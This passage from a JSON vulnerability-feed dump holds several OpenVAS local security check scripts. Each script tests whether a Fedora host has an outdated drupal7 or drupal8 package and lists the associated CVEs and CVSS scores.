value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-20794\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20794\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20766", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20766\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095371.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864980\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:31 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-20766\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20766\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-6a0717dc9a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875500", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875500\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-08 04:12:02 +0100 (Fri, 08 Mar 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-6a0717dc9a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6a0717dc9a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal8' package(s) announced via the FEDORA-2019-6a0717dc9a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.10~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-8fd924a53d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_8fd924a53d_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-8fd924a53d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 05:53:29 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-8fd924a53d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-7d748596e9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310814523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d748596e9_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-7d748596e9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814523\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:36 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-7d748596e9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d748596e9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2018-7d748596e9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated 
package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-79bd99f9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-6341", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875534", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
